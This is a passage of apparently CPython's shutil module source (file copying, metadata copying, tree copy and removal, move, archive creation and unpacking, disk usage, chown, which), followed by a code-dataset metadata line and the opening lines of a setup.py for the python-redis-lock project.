_fastcopy_fcopyfile(fsrc, fdst, posix._COPYFILE_DATA)
return dst
except _GiveupOnFastCopy:
pass
# Linux
elif _USE_CP_SENDFILE:
try:
_fastcopy_sendfile(fsrc, fdst)
return dst
except _GiveupOnFastCopy:
pass
# Windows, see:
# https://github.com/python/cpython/pull/7160#discussion_r195405230
elif _WINDOWS and file_size > 0:
_copyfileobj_readinto(fsrc, fdst, min(file_size, COPY_BUFSIZE))
return dst
copyfileobj(fsrc, fdst)
return dst
def copymode(src, dst, *, follow_symlinks=True):
"""Copy mode bits from src to dst.
If follow_symlinks is not set, symlinks aren't followed if and only
if both `src` and `dst` are symlinks. If `lchmod` isn't available
(e.g. Linux) this method does nothing.
"""
sys.audit("shutil.copymode", src, dst)
if not follow_symlinks and _islink(src) and os.path.islink(dst):
if hasattr(os, 'lchmod'):
stat_func, chmod_func = os.lstat, os.lchmod
else:
return
else:
stat_func, chmod_func = _stat, os.chmod
st = stat_func(src)
chmod_func(dst, stat.S_IMODE(st.st_mode))
if hasattr(os, 'listxattr'):
def _copyxattr(src, dst, *, follow_symlinks=True):
"""Copy extended filesystem attributes from `src` to `dst`.
Overwrite existing attributes.
If `follow_symlinks` is false, symlinks won't be followed.
"""
try:
names = os.listxattr(src, follow_symlinks=follow_symlinks)
except OSError as e:
if e.errno not in (errno.ENOTSUP, errno.ENODATA, errno.EINVAL):
raise
return
for name in names:
try:
value = os.getxattr(src, name, follow_symlinks=follow_symlinks)
os.setxattr(dst, name, value, follow_symlinks=follow_symlinks)
except OSError as e:
if e.errno not in (errno.EPERM, errno.ENOTSUP, errno.ENODATA,
errno.EINVAL):
raise
else:
def _copyxattr(*args, **kwargs):
pass
def copystat(src, dst, *, follow_symlinks=True):
"""Copy file metadata
Copy the permission bits, last access time, last modification time, and
flags from `src` to `dst`. On Linux, copystat() also copies the "extended
attributes" where possible. The file contents, owner, and group are
unaffected. `src` and `dst` are path-like objects or path names given as
strings.
If the optional flag `follow_symlinks` is not set, symlinks aren't
followed if and only if both `src` and `dst` are symlinks.
"""
sys.audit("shutil.copystat", src, dst)
def _nop(*args, ns=None, follow_symlinks=None):
pass
# follow symlinks (aka don't not follow symlinks)
follow = follow_symlinks or not (_islink(src) and os.path.islink(dst))
if follow:
# use the real function if it exists
def lookup(name):
return getattr(os, name, _nop)
else:
# use the real function only if it exists
# *and* it supports follow_symlinks
def lookup(name):
fn = getattr(os, name, _nop)
if fn in os.supports_follow_symlinks:
return fn
return _nop
if isinstance(src, os.DirEntry):
st = src.stat(follow_symlinks=follow)
else:
st = lookup("stat")(src, follow_symlinks=follow)
mode = stat.S_IMODE(st.st_mode)
lookup("utime")(dst, ns=(st.st_atime_ns, st.st_mtime_ns),
follow_symlinks=follow)
# We must copy extended attributes before the file is (potentially)
# chmod()'ed read-only, otherwise setxattr() will error with -EACCES.
_copyxattr(src, dst, follow_symlinks=follow)
try:
lookup("chmod")(dst, mode, follow_symlinks=follow)
except NotImplementedError:
# if we got a NotImplementedError, it's because
# * follow_symlinks=False,
# * lchown() is unavailable, and
# * either
# * fchownat() is unavailable or
# * fchownat() doesn't implement AT_SYMLINK_NOFOLLOW.
# (it returned ENOSUP.)
# therefore we're out of options--we simply cannot chown the
# symlink. give up, suppress the error.
# (which is what shutil always did in this circumstance.)
pass
if hasattr(st, 'st_flags'):
try:
lookup("chflags")(dst, st.st_flags, follow_symlinks=follow)
except OSError as why:
for err in 'EOPNOTSUPP', 'ENOTSUP':
if hasattr(errno, err) and why.errno == getattr(errno, err):
break
else:
raise
def copy(src, dst, *, follow_symlinks=True):
"""Copy data and mode bits ("cp src dst"). Return the file's destination.
The destination may be a directory.
If follow_symlinks is false, symlinks won't be followed. This
resembles GNU's "cp -P src dst".
If source and destination are the same file, a SameFileError will be
raised.
"""
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
copyfile(src, dst, follow_symlinks=follow_symlinks)
copymode(src, dst, follow_symlinks=follow_symlinks)
return dst
def copy2(src, dst, *, follow_symlinks=True):
"""Copy data and metadata. Return the file's destination.
Metadata is copied with copystat(). Please see the copystat function
for more information.
The destination may be a directory.
If follow_symlinks is false, symlinks won't be followed. This
resembles GNU's "cp -P src dst".
"""
if os.path.isdir(dst):
dst = os.path.join(dst, os.path.basename(src))
copyfile(src, dst, follow_symlinks=follow_symlinks)
copystat(src, dst, follow_symlinks=follow_symlinks)
return dst
def ignore_patterns(*patterns):
"""Function that can be used as copytree() ignore parameter.
Patterns is a sequence of glob-style patterns
that are used to exclude files"""
def _ignore_patterns(path, names):
ignored_names = []
for pattern in patterns:
ignored_names.extend(fnmatch.filter(names, pattern))
return set(ignored_names)
return _ignore_patterns
def _copytree(entries, src, dst, symlinks, ignore, copy_function,
ignore_dangling_symlinks, dirs_exist_ok=False):
if ignore is not None:
ignored_names = ignore(os.fspath(src), [x.name for x in entries])
else:
ignored_names = set()
os.makedirs(dst, exist_ok=dirs_exist_ok)
errors = []
use_srcentry = copy_function is copy2 or copy_function is copy
for srcentry in entries:
if srcentry.name in ignored_names:
continue
srcname = os.path.join(src, srcentry.name)
dstname = os.path.join(dst, srcentry.name)
srcobj = srcentry if use_srcentry else srcname
try:
is_symlink = srcentry.is_symlink()
if is_symlink and os.name == 'nt':
# Special check for directory junctions, which appear as
# symlinks but we want to recurse.
lstat = srcentry.stat(follow_symlinks=False)
if lstat.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT:
is_symlink = False
if is_symlink:
linkto = os.readlink(srcname)
if symlinks:
# We can't just leave it to `copy_function` because legacy
# code with a custom `copy_function` may rely on copytree
# doing the right thing.
os.symlink(linkto, dstname)
copystat(srcobj, dstname, follow_symlinks=not symlinks)
else:
# ignore dangling symlink if the flag is on
if not os.path.exists(linkto) and ignore_dangling_symlinks:
continue
# otherwise let the copy occur. copy2 will raise an error
if srcentry.is_dir():
copytree(srcobj, dstname, symlinks, ignore,
copy_function, dirs_exist_ok=dirs_exist_ok)
else:
copy_function(srcobj, dstname)
elif srcentry.is_dir():
copytree(srcobj, dstname, symlinks, ignore, copy_function,
dirs_exist_ok=dirs_exist_ok)
else:
# Will raise a SpecialFileError for unsupported file types
copy_function(srcobj, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error as err:
errors.extend(err.args[0])
except OSError as why:
errors.append((srcname, dstname, str(why)))
try:
copystat(src, dst)
except OSError as why:
# Copying file access times may fail on Windows
if getattr(why, 'winerror', None) is None:
errors.append((src, dst, str(why)))
if errors:
raise Error(errors)
return dst
def copytree(src, dst, symlinks=False, ignore=None, copy_function=copy2,
ignore_dangling_symlinks=False, dirs_exist_ok=False):
"""Recursively copy a directory tree and return the destination directory.
dirs_exist_ok dictates whether to raise an exception in case dst or any
missing parent directory already exists.
If exception(s) occur, an Error is raised with a list of reasons.
If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied. If the file pointed by the symlink doesn't
exist, an exception will be added in the list of errors raised in
an Error exception at the end of the copy process.
You can set the optional ignore_dangling_symlinks flag to true if you
want to silence this exception. Notice that this has no effect on
platforms that don't support os.symlink.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
The optional copy_function argument is a callable that will be used
to copy each file. It will be called with the source path and the
destination path as arguments. By default, copy2() is used, but any
function that supports the same signature (like copy()) can be used.
"""
sys.audit("shutil.copytree", src, dst)
with os.scandir(src) as itr:
entries = list(itr)
return _copytree(entries=entries, src=src, dst=dst, symlinks=symlinks,
ignore=ignore, copy_function=copy_function,
ignore_dangling_symlinks=ignore_dangling_symlinks,
dirs_exist_ok=dirs_exist_ok)
if hasattr(os.stat_result, 'st_file_attributes'):
# Special handling for directory junctions to make them behave like
# symlinks for shutil.rmtree, since in general they do not appear as
# regular links.
def _rmtree_isdir(entry):
try:
st = entry.stat(follow_symlinks=False)
return (stat.S_ISDIR(st.st_mode) and not
(st.st_file_attributes & stat.FILE_ATTRIBUTE_REPARSE_POINT
and st.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT))
except OSError:
return False
def _rmtree_islink(path):
try:
st = os.lstat(path)
return (stat.S_ISLNK(st.st_mode) or
(st.st_file_attributes & stat.FILE_ATTRIBUTE_REPARSE_POINT
and st.st_reparse_tag == stat.IO_REPARSE_TAG_MOUNT_POINT))
except OSError:
return False
else:
def _rmtree_isdir(entry):
try:
return entry.is_dir(follow_symlinks=False)
except OSError:
return False
def _rmtree_islink(path):
return os.path.islink(path)
# version vulnerable to race conditions
def _rmtree_unsafe(path, onerror):
try:
with os.scandir(path) as scandir_it:
entries = list(scandir_it)
except OSError:
onerror(os.scandir, path, sys.exc_info())
entries = []
for entry in entries:
fullname = entry.path
if _rmtree_isdir(entry):
try:
if entry.is_symlink():
# This can only happen if someone replaces
# a directory with a symlink after the call to
# os.scandir or entry.is_dir above.
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, fullname, sys.exc_info())
continue
_rmtree_unsafe(fullname, onerror)
else:
try:
os.unlink(fullname)
except OSError:
onerror(os.unlink, fullname, sys.exc_info())
try:
os.rmdir(path)
except OSError:
onerror(os.rmdir, path, sys.exc_info())
# Version using fd-based APIs to protect against races
def _rmtree_safe_fd(topfd, path, onerror):
try:
with os.scandir(topfd) as scandir_it:
entries = list(scandir_it)
except OSError as err:
err.filename = path
onerror(os.scandir, path, sys.exc_info())
return
for entry in entries:
fullname = os.path.join(path, entry.name)
try:
is_dir = entry.is_dir(follow_symlinks=False)
except OSError:
is_dir = False
else:
if is_dir:
try:
orig_st = entry.stat(follow_symlinks=False)
is_dir = stat.S_ISDIR(orig_st.st_mode)
except OSError:
onerror(os.lstat, fullname, sys.exc_info())
continue
if is_dir:
try:
dirfd = os.open(entry.name, os.O_RDONLY, dir_fd=topfd)
except OSError:
onerror(os.open, fullname, sys.exc_info())
else:
try:
if os.path.samestat(orig_st, os.fstat(dirfd)):
_rmtree_safe_fd(dirfd, fullname, onerror)
try:
os.rmdir(entry.name, dir_fd=topfd)
except OSError:
onerror(os.rmdir, fullname, sys.exc_info())
else:
try:
# This can only happen if someone replaces
# a directory with a symlink after the call to
# os.scandir or stat.S_ISDIR above.
raise OSError("Cannot call rmtree on a symbolic "
"link")
except OSError:
onerror(os.path.islink, fullname, sys.exc_info())
finally:
os.close(dirfd)
else:
try:
os.unlink(entry.name, dir_fd=topfd)
except OSError:
onerror(os.unlink, fullname, sys.exc_info())
_use_fd_functions = ({os.open, os.stat, os.unlink, os.rmdir} <=
os.supports_dir_fd and
os.scandir in os.supports_fd and
os.stat in os.supports_follow_symlinks)
def rmtree(path, ignore_errors=False, onerror=None):
"""Recursively delete a directory tree.
If ignore_errors is set, errors are ignored; otherwise, if onerror
is set, it is called to handle the error with arguments (func,
path, exc_info) where func is platform and implementation dependent;
path is the argument to that function that caused it to fail; and
exc_info is a tuple returned by sys.exc_info(). If ignore_errors
is false and onerror is None, an exception is raised.
"""
sys.audit("shutil.rmtree", path)
if ignore_errors:
def onerror(*args):
pass
elif onerror is None:
def onerror(*args):
raise
if _use_fd_functions:
# While the unsafe rmtree works fine on bytes, the fd based does not.
if isinstance(path, bytes):
path = os.fsdecode(path)
# Note: To guard against symlink races, we use the standard
# lstat()/open()/fstat() trick.
try:
orig_st = os.lstat(path)
except Exception:
onerror(os.lstat, path, sys.exc_info())
return
try:
fd = os.open(path, os.O_RDONLY)
except Exception:
onerror(os.open, path, sys.exc_info())
return
try:
if os.path.samestat(orig_st, os.fstat(fd)):
_rmtree_safe_fd(fd, path, onerror)
try:
os.rmdir(path)
except OSError:
onerror(os.rmdir, path, sys.exc_info())
else:
try:
# symlinks to directories are forbidden, see bug #1669
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, path, sys.exc_info())
finally:
os.close(fd)
else:
try:
if _rmtree_islink(path):
# symlinks to directories are forbidden, see bug #1669
raise OSError("Cannot call rmtree on a symbolic link")
except OSError:
onerror(os.path.islink, path, sys.exc_info())
# can't continue even if onerror hook returns
return
return _rmtree_unsafe(path, onerror)
# Allow introspection of whether or not the hardening against symlink
# attacks is supported on the current platform
rmtree.avoids_symlink_attacks = _use_fd_functions
def _basename(path):
# A basename() variant which first strips the trailing slash, if present.
# Thus we always get the last component of the path, even for directories.
sep = os.path.sep + (os.path.altsep or '')
return os.path.basename(path.rstrip(sep))
def move(src, dst, copy_function=copy2):
"""Recursively move a file or directory to another location. This is
similar to the Unix "mv" command. Return the file or directory's
destination.
If the destination is a directory or a symlink to a directory, the source
is moved inside the directory. The destination path must not already
exist.
If the destination already exists but is not a directory, it may be
overwritten depending on os.rename() semantics.
If the destination is on our current filesystem, then rename() is used.
Otherwise, src is copied to the destination and then removed. Symlinks are
recreated under the new name if os.rename() fails because of cross
filesystem renames.
The optional `copy_function` argument is a callable that will be used
to copy the source or it will be delegated to `copytree`.
By default, copy2() is used, but any function that supports the same
signature (like copy()) can be used.
A lot more could be done here... A look at a mv.c shows a lot of
the issues this implementation glosses over.
"""
sys.audit("shutil.move", src, dst)
real_dst = dst
if os.path.isdir(dst):
if _samefile(src, dst):
# We might be on a case insensitive filesystem,
# perform the rename anyway.
os.rename(src, dst)
return
real_dst = os.path.join(dst, _basename(src))
if os.path.exists(real_dst):
raise Error("Destination path '%s' already exists" % real_dst)
try:
os.rename(src, real_dst)
except OSError:
if os.path.islink(src):
linkto = os.readlink(src)
os.symlink(linkto, real_dst)
os.unlink(src)
elif os.path.isdir(src):
if _destinsrc(src, dst):
raise Error("Cannot move a directory '%s' into itself"
" '%s'." % (src, dst))
copytree(src, real_dst, copy_function=copy_function,
symlinks=True)
rmtree(src)
else:
copy_function(src, real_dst)
os.unlink(src)
return real_dst
def _destinsrc(src, dst):
src = os.path.abspath(src)
dst = os.path.abspath(dst)
if not src.endswith(os.path.sep):
src += os.path.sep
if not dst.endswith(os.path.sep):
dst += os.path.sep
return dst.startswith(src)
def _get_gid(name):
"""Returns a gid, given a group name."""
if getgrnam is None or name is None:
return None
try:
result = getgrnam(name)
except KeyError:
result = None
if result is not None:
return result[2]
return None
def _get_uid(name):
"""Returns an uid, given a user name."""
if getpwnam is None or name is None:
return None
try:
result = getpwnam(name)
except KeyError:
result = None
if result is not None:
return result[2]
return None
def _make_tarball(base_name, base_dir, compress="gzip", verbose=0, dry_run=0,
owner=None, group=None, logger=None):
"""Create a (possibly compressed) tar file from all the files under
'base_dir'.
'compress' must be "gzip" (the default), "bzip2", "xz", or None.
'owner' and 'group' can be used to define an owner and a group for the
archive that is being built. If not provided, the current owner and group
will be used.
The output tar file will be named 'base_name' + ".tar", possibly plus
the appropriate compression extension (".gz", ".bz2", or ".xz").
Returns the output filename.
"""
if compress is None:
tar_compression = ''
elif _ZLIB_SUPPORTED and compress == 'gzip':
tar_compression = 'gz'
elif _BZ2_SUPPORTED and compress == 'bzip2':
tar_compression = 'bz2'
elif _LZMA_SUPPORTED and compress == 'xz':
tar_compression = 'xz'
else:
raise ValueError("bad value for 'compress', or compression format not "
"supported : {0}".format(compress))
import tarfile # late import for breaking circular dependency
compress_ext = '.' + tar_compression if compress else ''
archive_name = base_name + '.tar' + compress_ext
archive_dir = os.path.dirname(archive_name)
if archive_dir and not os.path.exists(archive_dir):
if logger is not None:
logger.info("creating %s", archive_dir)
if not dry_run:
os.makedirs(archive_dir)
# creating the tarball
if logger is not None:
logger.info('Creating tar archive')
uid = _get_uid(owner)
gid = _get_gid(group)
def _set_uid_gid(tarinfo):
if gid is not None:
tarinfo.gid = gid
tarinfo.gname = group
if uid is not None:
tarinfo.uid = uid
tarinfo.uname = owner
return tarinfo
if not dry_run:
tar = tarfile.open(archive_name, 'w|%s' % tar_compression)
try:
tar.add(base_dir, filter=_set_uid_gid)
finally:
tar.close()
return archive_name
def _make_zipfile(base_name, base_dir, verbose=0, dry_run=0, logger=None):
"""Create a zip file from all the files under 'base_dir'.
The output zip file will be named 'base_name' + ".zip". Returns the
name of the output zip file.
"""
import zipfile # late import for breaking circular dependency
zip_filename = base_name + ".zip"
archive_dir = os.path.dirname(base_name)
if archive_dir and not os.path.exists(archive_dir):
if logger is not None:
logger.info("creating %s", archive_dir)
if not dry_run:
os.makedirs(archive_dir)
if logger is not None:
logger.info("creating '%s' and adding '%s' to it",
zip_filename, base_dir)
if not dry_run:
with zipfile.ZipFile(zip_filename, "w",
compression=zipfile.ZIP_DEFLATED) as zf:
path = os.path.normpath(base_dir)
if path != os.curdir:
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
for dirpath, dirnames, filenames in os.walk(base_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, path)
if logger is not None:
logger.info("adding '%s'", path)
return zip_filename
_ARCHIVE_FORMATS = {
'tar': (_make_tarball, [('compress', None)], "uncompressed tar file"),
}
if _ZLIB_SUPPORTED:
_ARCHIVE_FORMATS['gztar'] = (_make_tarball, [('compress', 'gzip')],
"gzip'ed tar-file")
_ARCHIVE_FORMATS['zip'] = (_make_zipfile, [], "ZIP file")
if _BZ2_SUPPORTED:
_ARCHIVE_FORMATS['bztar'] = (_make_tarball, [('compress', 'bzip2')],
"bzip2'ed tar-file")
if _LZMA_SUPPORTED:
_ARCHIVE_FORMATS['xztar'] = (_make_tarball, [('compress', 'xz')],
"xz'ed tar-file")
def get_archive_formats():
"""Returns a list of supported formats for archiving and unarchiving.
Each element of the returned sequence is a tuple (name, description)
"""
formats = [(name, registry[2]) for name, registry in
_ARCHIVE_FORMATS.items()]
formats.sort()
return formats
def register_archive_format(name, function, extra_args=None, description=''):
"""Registers an archive format.
name is the name of the format. function is the callable that will be
used to create archives. If provided, extra_args is a sequence of
(name, value) tuples that will be passed as arguments to the callable.
description can be provided to describe the format, and will be returned
by the get_archive_formats() function.
"""
if extra_args is None:
extra_args = []
if not callable(function):
raise TypeError('The %s object is not callable' % function)
if not isinstance(extra_args, (tuple, list)):
raise TypeError('extra_args needs to be a sequence')
for element in extra_args:
if not isinstance(element, (tuple, list)) or len(element) !=2:
raise TypeError('extra_args elements are : (arg_name, value)')
_ARCHIVE_FORMATS[name] = (function, extra_args, description)
def unregister_archive_format(name):
del _ARCHIVE_FORMATS[name]
def make_archive(base_name, format, root_dir=None, base_dir=None, verbose=0,
dry_run=0, owner=None, group=None, logger=None):
"""Create an archive file (eg. zip or tar).
'base_name' is the name of the file to create, minus any format-specific
extension; 'format' is the archive format: one of "zip", "tar", "gztar",
"bztar", or "xztar". Or any other registered format.
'root_dir' is a directory that will be the root directory of the
archive; ie. we typically chdir into 'root_dir' before creating the
archive. 'base_dir' is the directory where we start archiving from;
ie. 'base_dir' will be the common prefix of all files and
directories in the archive. 'root_dir' and 'base_dir' both default
to the current directory. Returns the name of the archive file.
'owner' and 'group' are used when creating a tar archive. By default,
uses the current owner and group.
"""
sys.audit("shutil.make_archive", base_name, format, root_dir, base_dir)
save_cwd = os.getcwd()
if root_dir is not None:
if logger is not None:
logger.debug("changing into '%s'", root_dir)
base_name = os.path.abspath(base_name)
if not dry_run:
os.chdir(root_dir)
if base_dir is None:
base_dir = os.curdir
kwargs = {'dry_run': dry_run, 'logger': logger}
try:
format_info = _ARCHIVE_FORMATS[format]
except KeyError:
raise ValueError("unknown archive format '%s'" % format) from None
func = format_info[0]
for arg, val in format_info[1]:
kwargs[arg] = val
if format != 'zip':
kwargs['owner'] = owner
kwargs['group'] = group
try:
filename = func(base_name, base_dir, **kwargs)
finally:
if root_dir is not None:
if logger is not None:
logger.debug("changing back to '%s'", save_cwd)
os.chdir(save_cwd)
return filename
def get_unpack_formats():
"""Returns a list of supported formats for unpacking.
Each element of the returned sequence is a tuple
(name, extensions, description)
"""
formats = [(name, info[0], info[3]) for name, info in
_UNPACK_FORMATS.items()]
formats.sort()
return formats
def _check_unpack_options(extensions, function, extra_args):
"""Checks what gets registered as an unpacker."""
# first make sure no other unpacker is registered for this extension
existing_extensions = {}
for name, info in _UNPACK_FORMATS.items():
for ext in info[0]:
existing_extensions[ext] = name
for extension in extensions:
if extension in existing_extensions:
msg = '%s is already registered for "%s"'
raise RegistryError(msg % (extension,
existing_extensions[extension]))
if not callable(function):
raise TypeError('The registered function must be a callable')
def register_unpack_format(name, extensions, function, extra_args=None,
description=''):
"""Registers an unpack format.
`name` is the name of the format. `extensions` is a list of extensions
corresponding to the format.
`function` is the callable that will be
used to unpack archives. The callable will receive archives to unpack.
If it's unable to handle an archive, it needs to raise a ReadError
exception.
If provided, `extra_args` is a sequence of
(name, value) tuples that will be passed as arguments to the callable.
description can be provided to describe the format, and will be returned
by the get_unpack_formats() function.
"""
if extra_args is None:
extra_args = []
_check_unpack_options(extensions, function, extra_args)
_UNPACK_FORMATS[name] = extensions, function, extra_args, description
def unregister_unpack_format(name):
"""Removes the pack format from the registry."""
del _UNPACK_FORMATS[name]
def _ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _unpack_zipfile(filename, extract_dir):
"""Unpack zip `filename` to `extract_dir`
"""
import zipfile # late import for breaking circular dependency
if not zipfile.is_zipfile(filename):
raise ReadError("%s is not a zip file" % filename)
zip = zipfile.ZipFile(filename)
try:
for info in zip.infolist():
name = info.filename
# don't extract absolute paths or ones with .. in them
if name.startswith('/') or '..' in name:
continue
target = os.path.join(extract_dir, *name.split('/'))
if not target:
continue
_ensure_directory(target)
if not name.endswith('/'):
# file
data = zip.read(info.filename)
f = open(target, 'wb')
try:
f.write(data)
finally:
f.close()
del data
finally:
zip.close()
def _unpack_tarfile(filename, extract_dir):
"""Unpack tar/tar.gz/tar.bz2/tar.xz `filename` to `extract_dir`
"""
import tarfile # late import for breaking circular dependency
try:
tarobj = tarfile.open(filename)
except tarfile.TarError:
raise ReadError(
"%s is not a compressed or uncompressed tar file" % filename)
try:
tarobj.extractall(extract_dir)
finally:
tarobj.close()
_UNPACK_FORMATS = {
'tar': (['.tar'], _unpack_tarfile, [], "uncompressed tar file"),
'zip': (['.zip'], _unpack_zipfile, [], "ZIP file"),
}
if _ZLIB_SUPPORTED:
_UNPACK_FORMATS['gztar'] = (['.tar.gz', '.tgz'], _unpack_tarfile, [],
"gzip'ed tar-file")
if _BZ2_SUPPORTED:
_UNPACK_FORMATS['bztar'] = (['.tar.bz2', '.tbz2'], _unpack_tarfile, [],
"bzip2'ed tar-file")
if _LZMA_SUPPORTED:
_UNPACK_FORMATS['xztar'] = (['.tar.xz', '.txz'], _unpack_tarfile, [],
"xz'ed tar-file")
def _find_unpack_format(filename):
for name, info in _UNPACK_FORMATS.items():
for extension in info[0]:
if filename.endswith(extension):
return name
return None
def unpack_archive(filename, extract_dir=None, format=None):
"""Unpack an archive.
`filename` is the name of the archive.
`extract_dir` is the name of the target directory, where the archive
is unpacked. If not provided, the current working directory is used.
`format` is the archive format: one of "zip", "tar", "gztar", "bztar",
or "xztar". Or any other registered format. If not provided,
unpack_archive will use the filename extension and see if an unpacker
was registered for that extension.
In case none is found, a ValueError is raised.
"""
sys.audit("shutil.unpack_archive", filename, extract_dir, format)
if extract_dir is None:
extract_dir = os.getcwd()
extract_dir = os.fspath(extract_dir)
filename = os.fspath(filename)
if format is not None:
try:
format_info = _UNPACK_FORMATS[format]
except KeyError:
raise ValueError("Unknown unpack format '{0}'".format(format)) from None
func = format_info[1]
func(filename, extract_dir, **dict(format_info[2]))
else:
# we need to look at the registered unpackers supported extensions
format = _find_unpack_format(filename)
if format is None:
raise ReadError("Unknown archive format '{0}'".format(filename))
func = _UNPACK_FORMATS[format][1]
kwargs = dict(_UNPACK_FORMATS[format][2])
func(filename, extract_dir, **kwargs)
if hasattr(os, 'statvfs'):
__all__.append('disk_usage')
_ntuple_diskusage = collections.namedtuple('usage', 'total used free')
_ntuple_diskusage.total.__doc__ = 'Total space in bytes'
_ntuple_diskusage.used.__doc__ = 'Used space in bytes'
_ntuple_diskusage.free.__doc__ = 'Free space in bytes'
def disk_usage(path):
"""Return disk usage statistics about the given path.
Returned value is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
"""
st = os.statvfs(path)
free = st.f_bavail * st.f_frsize
total = st.f_blocks * st.f_frsize
used = (st.f_blocks - st.f_bfree) * st.f_frsize
return _ntuple_diskusage(total, used, free)
elif _WINDOWS:
__all__.append('disk_usage')
_ntuple_diskusage = collections.namedtuple('usage', 'total used free')
def disk_usage(path):
"""Return disk usage statistics about the given path.
Returned values is a named tuple with attributes 'total', 'used' and
'free', which are the amount of total, used and free space, in bytes.
"""
total, free = nt._getdiskusage(path)
used = total - free
return _ntuple_diskusage(total, used, free)
def chown(path, user=None, group=None):
"""Change owner user and group of the given path.
user and group can be the uid/gid or the user/group names, and in that case,
they are converted to their respective uid/gid.
"""
sys.audit('shutil.chown', path, user, group)
if user is None and group is None:
raise ValueError("user and/or group must be set")
_user = user
_group = group
# -1 means don't change it
if user is None:
_user = -1
# user can either be an int (the uid) or a string (the system username)
elif isinstance(user, str):
_user = _get_uid(user)
if _user is None:
raise LookupError("no such user: {!r}".format(user))
if group is None:
_group = -1
elif not isinstance(group, int):
_group = _get_gid(group)
if _group is None:
raise LookupError("no such group: {!r}".format(group))
os.chown(path, _user, _group)
def get_terminal_size(fallback=(80, 24)):
"""Get the size of the terminal window.
For each of the two dimensions, the environment variable, COLUMNS
and LINES respectively, is checked. If the variable is defined and
the value is a positive integer, it is used.
When COLUMNS or LINES is not defined, which is the common case,
the terminal connected to sys.__stdout__ is queried
by invoking os.get_terminal_size.
If the terminal size cannot be successfully queried, either because
the system doesn't support querying, or because we are not
connected to a terminal, the value given in fallback parameter
is used. Fallback defaults to (80, 24) which is the default
size used by many terminal emulators.
The value returned is a named tuple of type os.terminal_size.
"""
# columns, lines are the working values
try:
columns = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
columns = 0
try:
lines = int(os.environ['LINES'])
except (KeyError, ValueError):
lines = 0
# only query if necessary
if columns <= 0 or lines <= 0:
try:
size = os.get_terminal_size(sys.__stdout__.fileno())
except (AttributeError, ValueError, OSError):
# stdout is None, closed, detached, or not a terminal, or
# os.get_terminal_size() is unsupported
size = os.terminal_size(fallback)
if columns <= 0:
columns = size.columns
if lines <= 0:
lines = size.lines
return os.terminal_size((columns, lines))
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
use_bytes = isinstance(cmd, bytes)
if path is None:
path = os.environ.get("PATH", None)
if path is None:
try:
path = os.confstr("CS_PATH")
except (AttributeError, ValueError):
# os.confstr() or CS_PATH is not available
path = os.defpath
# bpo-35755: Don't use os.defpath if the PATH environment variable is
# set to an empty string
# PATH='' doesn't match, whereas PATH=':' looks in the current directory
if not path:
return None
if use_bytes:
path = os.fsencode(path)
path = path.split(os.fsencode(os.pathsep))
else:
path = os.fsdecode(path)
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
curdir = os.curdir
if use_bytes:
curdir = os.fsencode(curdir)
if curdir not in path:
path.insert(0, curdir)
# PATHEXT is necessary to check on Windows.
pathext_source = os.getenv("PATHEXT") or _WIN_DEFAULT_PATHEXT
pathext = [ext for ext in pathext_source.split(os.pathsep) if ext]
if use_bytes:
pathext = [os.fsencode(ext) for ext in pathext]
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
| [
"[email protected]"
] | |
dc6194d9f9bf211787a355e6de94714e28514b5e | 6b63845777e94a06ebd4c728fee3fb3127d97033 | /setup.py | a32d9928d614164775df821d7305e5b6c3d84670 | [
"BSD-2-Clause"
] | permissive | mstaniszczak/python-redis-lock | 86c517a6d8b825ac767c8f6cd06f59519e0bf973 | 5cfa2f48cb06940355fb7776b16742b32c779571 | refs/heads/master | 2020-07-26T08:13:31.863248 | 2019-11-18T14:45:35 | 2019-11-18T14:45:35 | 208,586,940 | 0 | 0 | BSD-2-Clause | 2019-09-15T11:56:11 | 2019-09-15T11:56:10 | null | UTF-8 | Python | false | false | 2,945 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import find_packages
from setuptools import setup
def read(*names, **kwargs):
with io.open(
